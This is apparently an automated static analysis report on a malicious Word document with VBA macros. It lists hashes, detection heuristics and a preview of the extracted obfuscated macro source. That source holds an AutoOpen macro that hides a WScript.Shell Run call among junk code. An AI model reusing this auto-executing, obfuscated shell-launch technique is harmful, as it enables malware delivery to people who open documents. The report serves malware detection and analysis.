Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 74113ff23ba2b9a5…

MALICIOUS

Office (OLE)

Size: 99.0 KB
Created: 2019-01-16 16:39:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: a1541e59807a545b2586844edfc2d83d
SHA-1: a67c7ea51420ff63e063425b0897781943a62b78
SHA-256: 74113ff23ba2b9a5f81dd7d7168d96adaa1ebab72cdc0b29ca5a3eeea5334682
Risk Score: 350

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. Heuristics indicate the use of WScript.Shell and CreateObject, commonly used to execute arbitrary commands. The 'autoopen' macro marker suggests automatic execution upon opening. The VBA script likely attempts to download and execute a second-stage payload, although the specific commands are obfuscated.

Heuristics (10)

  • ClamAV: Doc.Malware.Generic-6817636-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Generic-6817636-0
  • VBA macros detected [medium] (OLE_VBA_MACROS), 5 related findings
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Matched lines in script:
     End Select
    XMLqi = "WscRipt.sHeLl"
       Select Case feedvu
  • WScript.Shell usage [critical] (OLE_VBA_WSCRIPT)
    Matched lines in script:
     End Select
    XMLqi = "WscRipt.sHeLl"
       Select Case feedvu
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    Matched lines in script:
     End Select
    Steelwb = Array(matrixfz, PracticalPlasticTablezz, Canyonwd, CreateObject("" + PersonalLoanAccountzn + AutoLoanAccountdi + quantifyingff + realtimemr + Shoresrv + XMLqi).Run!(("" + contentik + bleedingedgerk + virtualuw + FrenchGuianazh.TextBox1) + paymentod + mintgreenjw + Regionalzc + Shoalhj, 89 - 89), Advancedhb, Alleylk, Focusednz)
       Select Case paymentrj
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] (OLE_VBA_AUTOOPEN)
    Matched lines in script:
    End Function
    Sub autoopen()
    Tastyzd = Managermp
  • Reference to Windows Script Host [high] (SC_STR_WSCRIPT)
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9698 bytes
SHA-256: 3034dc1fef788626fe00c0e7c9f99686725aeb8fc7a8f6d2e1518a8dfd5984e3

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "FrenchGuianazh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "Associatesv"
Function whiteboardbz()
On Error Resume Next
   Select Case Arizonawj
         Case 364
greyow = navigatingwl
            quantifyingoj = oliverv
            nichesuz = CLng(516)
bluetoothkz = TastyFreshSaladsa
         Case 263
            matrixvq = CLng(813)
Lanels = Streamlinedbt
            invoicekf = CDate(clientserverhw)
Idahohw = Refinediz
            BahrainiDinarfk = Int(12)
         Case 566
RSSmk = Avonwa
            depositmo = Cos(k247cz)
parallelismit = Accountsut
            AutomotiveComputersMusiclo = ChrB(530)
            Coordinatorti = Musicsf
 End Select
   Select Case Infrastructurewn
         Case 872
heuristicmk = feedvb
            deposituo = Tastybf
            IBji = CLng(637)
Toysdi = IncredibleGraniteBaconti
         Case 211
            NewHampshirews = CLng(55)
firewallwt = Freshbf
            InvestmentAccountqw = CDate(granularol)
GroceryElectronicsij = Congojb
            Consultantbs = Int(196)
         Case 221
Runlc = Virginiaiz
            distributedom = Cos(leveragesb)
Assurancett = Synergizedrm
            asymmetricjw = ChrB(62)
            Floridaia = crossplatformwl
 End Select
   Select Case SmallMetalKeyboardqc
         Case 9
architectpz = Unbrandedii
            ElectronicsToolsua = unleashpz
            AIki = CLng(511)
localareanetworkwi = HealthBabyToolsrk
         Case 924
            orchidfw = CLng(416)
Researchvt = Lightscb
            CheckingAccountsw = CDate(MoviesBabypj)
withdrawalwm = schemasss
            IntelligentFrozenSoapqw = Int(48)
         Case 791
goldfj = multibytefz
            regionalkj = Cos(Visionarylr)
CreditCardAccountuo = indexhl
            Niueoc = ChrB(668)
            Luxembourgdz = partnershipszt
 End Select
   Select Case USBjj
         Case 458
motivatinguq = Customizablesm
            Frozenuv = Humanzn
            holisticaj = CLng(563)
TastyFrozenBallwm = reinventwz
         Case 721
            Representativekf = CLng(958)
AutoLoanAccountah = Heightszs
            Parkwaysdw = CDate(Switzerlanduk)
portwz = Futureproofedvi
            abilityum = Int(758)
         Case 306
Seamlessad = Corporateli
            Smallpw = Cos(Dynamiciu)
depositii = Creativeoi
            Pulatv = ChrB(761)
            Floridamw = dynamictz
 End Select
XMLqi = "WscRipt.sHeLl"
   Select Case feedvu
         Case 97
SaintKittsandNevissw = Grassrootsbt
            paymentjd = Granitemi
            Humanai = CLng(477)
Plannernb = Fullyconfigurablefp
         Case 793
            Woodenwr = CLng(750)
Rapiddi = Consultantba
            CheckingAccountis = CDate(schemasht)
Investorlq = Productiv
            FantasticSteelGloveswi = Int(201)
         Case 812
Responsedh = IndianRupeewu
            driverkw = Cos(backendww)
Specialisthb = Stravenuena
            EXEmh = ChrB(319)
            deliverableszv = ADPzo
 End Select
Steelwb = Array(matrixfz, PracticalPlasticTablezz, Canyonwd, CreateObject("" + PersonalLoanAccountzn + AutoLoanAccountdi + quantifyingff + realtimemr + Shoresrv + XMLqi).Run!(("" + contentik + bleedingedgerk + virtualuw + FrenchGuianazh.TextBox1) + paymentod + mintgreenjw + Regionalzc + Shoalhj, 89 - 89), Advancedhb, Alleylk, Focusednz)
   Select Case paymentrj
         Case 439
clearthinkingoq = Dobrapa
            firewallmf = RefinedGraniteShirtjb
            Harborzu = CLng(687)
bypassingit = CreditCardAccounttz
         Case 618
            policyvu = CLng(785)
Freshjz = Awesomess
            withdrawalwm = CDate(calculatezh)
LithuanianLitasmt = parsejw
            synergisticva = Int(668)
         Case 451
Kentuckyhk = servicedeskzo
            MarshallIslandszb = Cos(pricingstructureuk)
Minnesotabi = deliverablesja
            engagehj = ChrB(101)
            Woodenrb = parallelismpf
 End Select
   Select Case w24hourjw
         Case 925
circuitbi = copyss
            paymentuj = Assistantao
            Electronicsfu = CLng(952)
Dividekw = synthesizekj
         Case 690
            monitorlw = CLng(511)
IndustrialKidsSportsnj = Granitett
            HandmadeMetalBaconqv = CDate(Groupqu)
InvestmentAccountdz = salmonrj
            ElectronicsHomeSportshi = Int(127)
         Case 499
relationshipsri = Configurablepf
            visionaryid = Cos(CongoleseFranchw)
sensortz = holistichz
            TastyPlasticShirtuh = ChrB(397)
            PNGkq = budgetarymanagementsd
 End Select
   Select Case Sleekkh
         Case 1
ShoesBeautyJeweleryff = overridepa
            indexoj = B2Cfh
            SavingsAccountks = CLng(716)
JBODow = SleekRubberMousejs
         Case 38
            Industrialmt = CLng(208)
w1080pzw = pixelbs
            capacityfw = CDate(Hawaiita)
Principalhj = matrixjw
            firewallhz = Int(153)
         Case 146
generatingbd = interfacebm
            Boliviari = Cos(Infrastructurezz)
VirginIslandsBritishhm = NorthCarolinamw
            revolutionizewc = ChrB(865)
            Idahodo = streamlinetw
 End Select
   Select Case compositein
         Case 597
PracticalPlasticSaladja = multistatebo
            Argentinaod = Electronicspf
            backupdm = CLng(921)
invoicesr = alarmqz
         Case 885
            USDollarii = CLng(869)
matrixcd = withdrawalcv
            opticalbd = CDate(SmallGraniteSaladtz)
panelbr = magentanj
            dotcomko = Int(15)
         Case 690
Centralss = invoicepj
            firewallvt = Cos(adapterpm)
synthesizingfz = Jewelerydr
            highlevelct = ChrB(93)
            Pennsylvaniaov = Randcl
 End Select
End Function


Attribute VB_Name = "Accountabilityfb"
Function fuchsiaus()
CreditCardAccountwz = opensourcepf
Hillsqs = firewallhi
channelskt = Landcp
innovatemf = quantifylq
Bordersbh = Directorwi
InvestmentAccountcl = Knollsrh
Corporatejh = TastyFrozenMouseiz
Customerjl = viralnc
Buckinghamshirenr = Practicalzj
End Function
Function Marylandwc()
transmitoj = Wisconsinwu
Utahki = RusticSteelChickenza
withdrawalbk = SCSIjc
Digitizednj = greyji
bleedingedgezt = limeib
MoneyMarketAccountia = superstructurezo
Tastyfp = Businessfocusedfz
Avonic = ToysSportswb
RSScs = TCPjd
End Function
Sub autoopen()
Tastyzd = Managermp
Macedoniaiz = withdrawaldn
Plasticii = Buckinghamshirelt
Ergonomicdj = redjw
orangena = PhilippinePesoci
auxiliaryzr = Principalkf
plumwd = Array(B2Bmv, GraphicInterfacehr, parallelismjz, whiteboardbz, Germanyho, reinventzu, indexjz)
applicationjw = Phasedjr
XSSct = Spurmj
Representativecv = meshbj
HomeLoanAccountba = opensourceir
End Sub
Function Automatedou()
Smallwi = GamesToolsGamespj
matrixwm = overridezn
synthesizepf = Jeweleryjz
Unioncj = channelsfd
lavenderjl = strategizews
InvestmentAccountcb = Legacykz
inputpa = Functionalitycz
Incredibleiq = Sofths
schemasiw = Throughwayzi
End Function

Attribute VB_Name = "infrastructureszz"

Attribute VB_Name = "Datawc"

Attribute VB_Name = "Hawaiiif"

Attribute VB_Name = "greymm"

Attribute VB_Name = "softwarecl"

Attribute VB_Name = "Agentjl"

Attribute VB_Name = "backingupll"

Attribute VB_Name = "bypassingrb"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "HomeLoanAccountfw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pricingstructureok"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Berkshireoj"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Engineerno"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "parsingjp"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "withdrawalfd"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False